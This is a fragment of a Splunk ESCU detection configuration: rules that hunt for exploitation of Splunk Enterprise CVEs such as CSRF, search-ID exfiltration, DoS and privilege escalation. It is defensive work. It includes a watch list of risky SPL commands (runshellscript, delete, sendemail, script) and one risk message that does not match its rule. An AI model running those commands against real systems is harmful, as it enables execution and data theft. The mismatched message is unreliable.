action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 40, "cve": ["CVE-2022-32154"], "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1059"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | tstats sum(Search_Activity.total_run_time) AS run_time, values(Search_Activity.search) as searches, count FROM datamodel=Splunk_Audit.Search_Activity WHERE (Search_Activity.user!="") AND (Search_Activity.total_run_time>1) AND (earliest=-1h@h latest=now) AND (Search_Activity.search IN ("*| runshellscript *", "*| collect *","*| delete *", "*| fit *", "*| outputcsv *", "*| outputlookup *", "*| run *", "*| script *", "*| sendalert *", "*| sendemail *", "*| tscolle*")) AND (Search_Activity.search_type=adhoc) AND (Search_Activity.user!=splunk-system-user) BY _time, Search_Activity.user span=1h | apply risky_command_abuse | fields _time, Search_Activity.user, searches, run_time, IsOutlier(run_time) | rename IsOutlier(run_time) as isOutlier, _time as timestamp | where isOutlier>0.5 | `splunk_command_and_scripting_interpreter_risky_spl_mltk_filter`

[ESCU - Splunk csrf in the ssg kvstore client endpoint - Rule]
action.escu = 0
action.escu.enabled = 1
description = In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, a cross-site request forgery in the Splunk Secure Gateway (SSG) app in the kvstore_client endpoint allows for updating SSG KV store collections via a GET request. SSG is a Splunk-built app included by default with Splunk Enterprise. The vulnerability affects instances with SSG and Splunk Web enabled. This hunting search provides information on the affected server, the specific method, and the post data that may reveal exploitation of this vulnerability.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, a cross-site request forgery in the Splunk Secure Gateway (SSG) app in the kvstore_client endpoint allows for updating SSG KV store collections via a GET request. SSG is a Splunk-built app included by default with Splunk Enterprise. The vulnerability affects instances with SSG and Splunk Web enabled. This hunting search provides information on the affected server, the specific method, and the post data that may reveal exploitation of this vulnerability.
action.escu.how_to_implement = Requires access to internal index.
action.escu.known_false_positives = This hunting search only applies to the affected versions and setup mentioned in the description of this search; it does not extract the payload, so it requires manual investigation after executing the search. This search will produce false positives.
action.escu.creation_date = 2023-02-14
action.escu.modification_date = 2023-02-14
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk csrf in the ssg kvstore client endpoint - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Splunk Vulnerabilities"]
action.risk = 1
action.risk.param._risk_message = Potential CSRF exploitation attempt from $splunk_server$
action.risk.param._risk = [{"risk_object_field": "splunk_server", "risk_object_type": "system", "risk_score": 25}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk csrf in the ssg kvstore client endpoint - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2023-22942"], "impact": 50, "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1189"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = In Splunk Enterprise versions below 8.1.13, 8.2.10, and 9.0.4, a cross-site request forgery in the Splunk Secure Gateway (SSG) app in the kvstore_client endpoint allows for updating SSG KV store collections via a GET request. SSG is a Splunk-built app included by default with Splunk Enterprise. The vulnerability affects instances with SSG and Splunk Web enabled. This hunting search provides information on the affected server, the specific method, and the post data that may reveal exploitation of this vulnerability.
action.notable.param.rule_title = Splunk csrf in the ssg kvstore client endpoint
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `splunkda` uri_path="/en-US/splunkd/__raw/services/ssg/kvstore_client" method="GET" delete_field_value="spacebridge_server" status="200" | table splunk_server status uri delete_field_value method post_data | `splunk_csrf_in_the_ssg_kvstore_client_endpoint_filter`

[ESCU - Splunk Data exfiltration from Analytics Workspace using sid query - Rule]
action.escu = 0
action.escu.enabled = 1
description = This hunting search allows an operator to discover attempts to exfiltrate data by executing a prepositioned malicious search ID in Analytic Workspace in Splunk Enterprise versions 8.2.9, 8.1.12, 9.0.2. The attack is browser-based. It requires the attacker to compel a victim to initiate a request within their browser (phishing). The attacker cannot exploit the vulnerability at will.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1567"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This hunting search allows an operator to discover attempts to exfiltrate data by executing a prepositioned malicious search ID in Analytic Workspace in Splunk Enterprise versions 8.2.9, 8.1.12, 9.0.2. The attack is browser-based. It requires the attacker to compel a victim to initiate a request within their browser (phishing). The attacker cannot exploit the vulnerability at will.
action.escu.how_to_implement = The vulnerability affects only instances with Splunk Web Enabled. After running this search, please run "Splunk Command and Scripting Interpreter Risky SPL MLTK" to gain more insight into potentially risky commands which could lead to data exfiltration.
action.escu.known_false_positives = This search may produce false positives. This detection does not require you to ingest any new data. The detection does require the ability to search the _audit index. Special attention must be paid to "/en-US/app/search/analytics_workspace?sid=[sid]" which is where the malicious code will be inserted to trigger the attack against the victim.
action.escu.creation_date = 2022-11-1
action.escu.modification_date = 2022-11-1
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk Data exfiltration from Analytics Workspace using sid query - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Splunk Internal Logs"]
action.escu.analytic_story = ["Splunk Vulnerabilities"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk Data exfiltration from Analytics Workspace using sid query - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2022-43566"], "impact": 50, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1567"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `audit_searches` info=granted search NOT ("audit_searches") search NOT ("security_content_summariesonly") AND ((search="*mstats*[*]*" AND provenance="N/A") OR (search="*mstats*\\\"*[*]*\\\"*"))| eval warning=if(match(search,"\\\\\""), "POTENTIAL INJECTION STAGING", "POTENTIAL INJECTION EXECUTION") | table search, user, warning, timestamp | `splunk_data_exfiltration_from_analytics_workspace_using_sid_query_filter`

[ESCU - Splunk Digital Certificates Infrastructure Version - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search will check that TLS validation is properly configured on the search head it is run from as well as its search peers after Splunk version 9. Other components such as additional search heads or anything this rest command cannot be distributed to will need to be manually checked.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization"], "mitre_attack": ["T1587.003"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This search will check that TLS validation is properly configured on the search head it is run from as well as its search peers after Splunk version 9. Other components such as additional search heads or anything this rest command cannot be distributed to will need to be manually checked.
action.escu.how_to_implement = The user running this search is required to have a permission allowing them to dispatch REST requests to indexers (the `dispatch_rest_to_indexers` capability) in some architectures. Splunk SOAR customers can find a SOAR workbook that walks an analyst through the process of running these hunting searches in the references list of this detection. In order to use this workbook, a user will need to run a curl command to post the file to their SOAR instance such as "curl -u username:password https://soar.instance.name/rest/rest/workbook_template -d @splunk_psa_0622.json". A user should then create an empty container or case, attach the workbook, and begin working through the tasks.
action.escu.known_false_positives = None known at this time.
action.escu.creation_date = 2022-05-26
action.escu.modification_date = 2022-05-26
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk Digital Certificates Infrastructure Version - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Splunk Vulnerabilities"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk Digital Certificates Infrastructure Version - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2022-32153"], "impact": 50, "kill_chain_phases": ["Weaponization"], "mitre_attack": ["T1587.003"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = | rest /services/server/info | table splunk_server version server_roles | join splunk_server [| rest /servicesNS/nobody/search/configs/conf-server/ search="sslConfig"| table splunk_server sslVerifyServerCert sslVerifyServerName serverCert] | fillnull value="Not Set" | rename sslVerifyServerCert as "Server.conf:SslConfig:sslVerifyServerCert", sslVerifyServerName as "Server.conf:SslConfig:sslVerifyServerName", serverCert as "Server.conf:SslConfig:serverCert" | `splunk_digital_certificates_infrastructure_version_filter`

[ESCU - Splunk Digital Certificates Lack of Encryption - Rule]
action.escu = 0
action.escu.enabled = 1
description = On June 14th, 2022, Splunk released a security advisory relating to the authentication that happens between Universal Forwarders and Deployment Servers. In some circumstances, an unauthenticated client can download forwarder bundles from the Deployment Server. In other circumstances, a client may be allowed to publish a forwarder bundle to other clients, which may allow for arbitrary code execution. The fixes for these require upgrading to at least Splunk 9.0 on the forwarder as well. This is a great opportunity to configure TLS across the environment. This search looks for forwarders that are not using TLS and adds risk to those entities.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Weaponization"], "mitre_attack": ["T1587.003"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = On June 14th, 2022, Splunk released a security advisory relating to the authentication that happens between Universal Forwarders and Deployment Servers. In some circumstances, an unauthenticated client can download forwarder bundles from the Deployment Server. In other circumstances, a client may be allowed to publish a forwarder bundle to other clients, which may allow for arbitrary code execution. The fixes for these require upgrading to at least Splunk 9.0 on the forwarder as well. This is a great opportunity to configure TLS across the environment. This search looks for forwarders that are not using TLS and adds risk to those entities.
action.escu.how_to_implement = This anomaly search looks for forwarder connections that are not currently using TLS. It then presents the source IP, the type of forwarder, and the version of the forwarder. You can also remove the "ssl=false" argument from the initial stanza in order to get a full list of all your forwarders that are sending data, and the version of Splunk software they are running, for audit purposes. Splunk SOAR customers can find a SOAR workbook that walks an analyst through the process of running these hunting searches in the references list of this detection. In order to use this workbook, a user will need to run a curl command to post the file to their SOAR instance such as "curl -u username:password https://soar.instance.name/rest/rest/workbook_template -d @splunk_psa_0622.json". A user should then create an empty container or case, attach the workbook, and begin working through the tasks.
action.escu.known_false_positives = None at this time
action.escu.creation_date = 2022-05-26
action.escu.modification_date = 2022-05-26
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk Digital Certificates Lack of Encryption - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Splunk Vulnerabilities"]
action.risk = 1
action.risk.param._risk_message = $hostname$ is not using TLS when forwarding data
action.risk.param._risk = [{"risk_object_field": "hostname", "risk_object_type": "system", "risk_score": 20}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk Digital Certificates Lack of Encryption - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 80, "cve": ["CVE-2022-32151"], "impact": 25, "kill_chain_phases": ["Weaponization"], "mitre_attack": ["T1587.003"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `splunkd` group="tcpin_connections" ssl="false" | stats values(sourceIp) latest(fwdType) latest(version) by hostname | `splunk_digital_certificates_lack_of_encryption_filter`

[ESCU - Splunk DoS Using Malformed SAML Request - Rule]
action.escu = 0
action.escu.enabled = 1
description = In Splunk Enterprise versions lower than 9.0.6, and 8.2.12, an attacker can send a malformed security assertion markup language SAML request to the /saml/acs REST endpoint which can cause a denial of service through a crash or hang of the Splunk daemon. The SAML extensible markup language (XML) parser does not fail SAML signature validation when the attacker modifies the URI in the SAML request. Instead it attempts to access the modified URI, which causes the Splunk daemon to crash or hang.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1498"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = In Splunk Enterprise versions lower than 9.0.6, and 8.2.12, an attacker can send a malformed security assertion markup language SAML request to the /saml/acs REST endpoint which can cause a denial of service through a crash or hang of the Splunk daemon. The SAML extensible markup language (XML) parser does not fail SAML signature validation when the attacker modifies the URI in the SAML request. Instead it attempts to access the modified URI, which causes the Splunk daemon to crash or hang.
action.escu.how_to_implement = To run this search, you must have access to the _internal index.
action.escu.known_false_positives = This search will show false positives. The analyst must look for errors and a pointer indicating a malicious file.
action.escu.creation_date = 2023-09-05
action.escu.modification_date = 2023-09-05
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk DoS Using Malformed SAML Request - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Splunk Vulnerabilities"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk DoS Using Malformed SAML Request - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 30, "impact": 50, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1498"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `splunkd` event_message=*error* expr=*xpointer* | stats count min(_time) as firstTime max(_time) as lastTime by component expr splunk_server event_message | `security_content_ctime(firstTime)`| `security_content_ctime(lastTime)` | `splunk_dos_using_malformed_saml_request_filter`

[ESCU - Splunk DOS Via Dump SPL Command - Rule]
action.escu = 0
action.escu.enabled = 1
description = In Splunk Enterprise versions below 9.0.5, 8.2.11, and 8.1.14, an attacker can exploit a vulnerability in the dump SPL command to cause a Denial of Service by crashing the Splunk daemon.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1499.004"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = In Splunk Enterprise versions below 9.0.5, 8.2.11, and 8.1.14, an attacker can exploit a vulnerability in the dump SPL command to cause a Denial of Service by crashing the Splunk daemon.
action.escu.how_to_implement = This search does not require additional ingestion of data. Requires the ability to search _internal index and monitor segmentation faults.
action.escu.known_false_positives = Segmentation faults may occur due to other causes, so this search may produce false positives
action.escu.creation_date = 2023-05-10
action.escu.modification_date = 2023-05-10
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk DOS Via Dump SPL Command - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Splunk Vulnerabilities"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk DOS Via Dump SPL Command - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 100, "impact": 100, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1499.004"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `splunk_crash_log` "*Segmentation fault*" | stats count by host _time | `splunk_dos_via_dump_spl_command_filter`

[ESCU - Splunk DoS via Malformed S2S Request - Rule]
action.escu = 0
action.escu.enabled = 1
description = On March 24th, 2022, Splunk published a security advisory for a possible Denial of Service stemming from the lack of validation in a specific key-value field in the Splunk-to-Splunk (S2S) protocol. This detection will alert on attempted exploitation in patched versions of Splunk.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1498"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = On March 24th, 2022, Splunk published a security advisory for a possible Denial of Service stemming from the lack of validation in a specific key-value field in the Splunk-to-Splunk (S2S) protocol. This detection will alert on attempted exploitation in patched versions of Splunk.
action.escu.how_to_implement = This detection does not require you to ingest any new data. The detection does require the ability to search the _internal index. This detection will only find attempted exploitation on versions of Splunk already patched for CVE-2021-3422.
action.escu.known_false_positives = None.
action.escu.creation_date = 2022-03-24
action.escu.modification_date = 2022-03-24
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk DoS via Malformed S2S Request - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Splunk Vulnerabilities"]
action.risk = 1
action.risk.param._risk_message = An attempt to exploit CVE-2021-3422 was detected from $src$ against $host$
action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "system", "risk_score": 50}, {"threat_object_field": "src", "threat_object_type": "ip_address"}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk DoS via Malformed S2S Request - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2021-3422"], "impact": 50, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1498"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = On March 24th, 2022, Splunk published a security advisory for a possible Denial of Service stemming from the lack of validation in a specific key-value field in the Splunk-to-Splunk (S2S) protocol. This detection will alert on attempted exploitation in patched versions of Splunk.
action.notable.param.rule_title = Splunk DoS via Malformed S2S Request
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `splunkd` log_level="ERROR" component="TcpInputProc" thread_name="FwdDataReceiverThread" "Invalid _meta atom" | table host, src | `splunk_dos_via_malformed_s2s_request_filter`

[ESCU - Splunk DOS via printf search function - Rule]
action.escu = 0
action.escu.enabled = 1
description = This hunting search provides information on detecting a vulnerability in Splunk Enterprise versions lower than 8.1.14, 8.2.12, 9.0.6, and 9.1.1, where an attacker can use the printf SPL function to perform a denial of service against the Splunk Enterprise instance.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1499.004"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = This hunting search provides information on detecting a vulnerability in Splunk Enterprise versions lower than 8.1.14, 8.2.12, 9.0.6, and 9.1.1, where an attacker can use the printf SPL function to perform a denial of service against the Splunk Enterprise instance.
action.escu.how_to_implement = This search requires the ability to search internal indexes.
action.escu.known_false_positives = This search may produce false positives; the analyst must focus on the use of the printf conversion function of eval to craft an expression that splunkd cannot interpret correctly, causing it to crash.
action.escu.creation_date = 2023-08-30
action.escu.modification_date = 2023-08-30
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk DOS via printf search function - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = ["Splunk Internal Logs"]
action.escu.analytic_story = ["Splunk Vulnerabilities"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk DOS via printf search function - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 100, "cve": ["CVE-2023-40594"], "impact": 100, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1499.004"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `audit_searches` "*makeresults * eval * fieldformat *printf*" user!="splunk_system_user" search!="*audit_searches*" | stats count by user splunk_server host search | convert ctime(*time) |`splunk_dos_via_printf_search_function_filter`

[ESCU - Splunk Edit User Privilege Escalation - Rule]
action.escu = 0
action.escu.enabled = 1
description = A low-privilege user who holds a role that has the edit_user capability assigned to it can escalate their privileges to that of the admin user by providing specially crafted web requests.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = A low-privilege user who holds a role that has the edit_user capability assigned to it can escalate their privileges to that of the admin user by providing specially crafted web requests.
action.escu.how_to_implement = This detection does not require you to ingest any new data. The detection does require the ability to search the _audit index. This detection may assist in efforts to discover abuse of edit_user privilege.
action.escu.known_false_positives = This search may produce false positives as password changing actions may be part of normal behavior. Operator will need to investigate these actions in order to discern exploitation attempts.
action.escu.creation_date = 2023-05-23
action.escu.modification_date = 2023-05-23
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk Edit User Privilege Escalation - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Splunk Vulnerabilities"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk Edit User Privilege Escalation - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 80, "cve": ["CVE-2023-32707"], "impact": 80, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `audittrail` action IN ("change_own_password","password_change","edit_password") AND info="granted" AND NOT user IN (admin, splunk-system-user) | stats earliest(_time) as event_time values(index) as index values(sourcetype) as sourcetype values(action) as action values(info) as info by user | `splunk_edit_user_privilege_escalation_filter`

[ESCU - Splunk Endpoint Denial of Service DoS Zip Bomb - Rule]
action.escu = 0
action.escu.enabled = 1
description = This search allows an operator to identify Splunk search app crashes resulting from a specially crafted ZIP file using file monitoring that affects UF versions 8.1.11 and 8.2 versions below 8.2.7.1. It is not possible to detect a Zip Bomb attack before the crash. This search will provide Universal Forwarder errors from uploaded binary files (zip compression) which are used for this attack. If an analyst sees results from this search, we suggest investigating and triaging which zip file was uploaded; zip-compressed files may have different extensions.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1499"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = This search allows an operator to identify Splunk search app crashes resulting from a specially crafted ZIP file using file monitoring that affects UF versions 8.1.11 and 8.2 versions below 8.2.7.1. It is not possible to detect a Zip Bomb attack before the crash. This search will provide Universal Forwarder errors from uploaded binary files (zip compression) which are used for this attack. If an analyst sees results from this search, we suggest investigating and triaging which zip file was uploaded; zip-compressed files may have different extensions.
action.escu.how_to_implement = Need to monitor Splunkd data from Universal Forwarders.
action.escu.known_false_positives = This search may reveal non-malicious zip files causing errors as well.
action.escu.creation_date = 2022-08-02
action.escu.modification_date = 2022-08-02
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk Endpoint Denial of Service DoS Zip Bomb - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Splunk Vulnerabilities"]
action.risk = 1
action.risk.param._risk_message = Potential exposure of environment variables from url embedded in dashboard
action.risk.param._risk = [{"risk_object_field": "host", "risk_object_type": "system", "risk_score": 75}]
action.risk.param._risk_score = 0
action.risk.param.verbose = 0
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk Endpoint Denial of Service DoS Zip Bomb - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 75, "cve": ["CVE-2022-37439"], "impact": 100, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1499"], "nist": ["DE.CM"]}
schedule_window = auto
action.notable = 1
action.notable.param.nes_fields = user,dest
action.notable.param.rule_description = This search allows an operator to identify Splunk search app crashes resulting from a specially crafted ZIP file using file monitoring that affects UF versions 8.1.11 and 8.2 versions below 8.2.7.1. It is not possible to detect a Zip Bomb attack before the crash. This search will provide Universal Forwarder errors from uploaded binary files (zip compression) which are used for this attack. If an analyst sees results from this search, we suggest investigating and triaging which zip file was uploaded; zip-compressed files may have different extensions.
action.notable.param.rule_title = Splunk Endpoint Denial of Service DoS Zip Bomb
action.notable.param.security_domain = threat
action.notable.param.severity = high
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `splunkd` component=FileClassifierManager event_message=*invalid* event_message=*binary* |stats count by host component event_message | `splunk_endpoint_denial_of_service_dos_zip_bomb_filter`

[ESCU - Splunk Enterprise KV Store Incorrect Authorization - Rule]
action.escu = 0
action.escu.enabled = 1
description = In Splunk Enterprise versions below 9.0.8 and 9.1.3, Splunk app key value store KV Store improperly handles permissions for users using the REST application programming interface (API). This can potentially result in the deletion of KV Store collections.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548"], "nist": ["DE.AE"]}
action.escu.data_models = []
action.escu.eli5 = In Splunk Enterprise versions below 9.0.8 and 9.1.3, Splunk app key value store KV Store improperly handles permissions for users using the REST application programming interface (API). This can potentially result in the deletion of KV Store collections.
action.escu.how_to_implement = Requires access to internal indexes and REST API enabled instances.
action.escu.known_false_positives = This is a hunting search and will produce false positives. Operator must follow results into instances where curl requests coming from actual users may indicate intent of exploitation.
action.escu.creation_date = 2024-01-18
action.escu.modification_date = 2024-01-18
action.escu.confidence = high
action.escu.full_search_name = ESCU - Splunk Enterprise KV Store Incorrect Authorization - Rule
action.escu.search_type = detection
action.escu.product = ["Splunk Enterprise", "Splunk Cloud"]
action.escu.providing_technologies = null
action.escu.analytic_story = ["Splunk Vulnerabilities"]
cron_schedule = 0 * * * *
dispatch.earliest_time = -70m@m
dispatch.latest_time = -10m@m
action.correlationsearch.enabled = 1
action.correlationsearch.label = ESCU - Splunk Enterprise KV Store Incorrect Authorization - Rule
action.correlationsearch.annotations = {"analytic_story": ["Splunk Vulnerabilities"], "cis20": ["CIS 10"], "confidence": 50, "cve": ["CVE-2024-23675"], "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548"], "nist": ["DE.AE"]}
schedule_window = auto
alert.digest_mode = 1
disabled = true
enableSched = 1
allow_skew = 100%
counttype = number of events
relation = greater than
quantity = 0
realtime_schedule = 0
is_visible = false
search = `splunkda` uri=/servicesNS/nobody/search/admin/collections-conf/_reload status=2* method="POST" user=* file=_reload | stats count min(_time) as firstTime max(_time) as lastTime values(status) as status by host clientip file method | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `splunk_enterprise_kv_store_incorrect_authorization_filter`

[ESCU - Splunk Enterprise Windows Deserialization File Partition - Rule]
action.escu = 0
action.escu.enabled = 1
description = In Splunk Enterprise for Windows versions below 9.0.8 and 9.1.3, Splunk Enterprise does not correctly sanitize path input data resulting in the unsafe deserialization of untrusted data. This vulnerability only affects Splunk Enterprise for Windows.
action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Delivery"], "mitre_attack": ["T1190"], "nist": ["DE.CM"]}
action.escu.data_models = []
action.escu.eli5 = In Splunk Enterprise for Windows versions below 9.0.8 and 9.1.3, Splunk Enterprise does not correctly sanitize path input data resulting in the unsafe deserialization of untrusted data. This vulnerability only affects Splunk Enterprise for Windows.
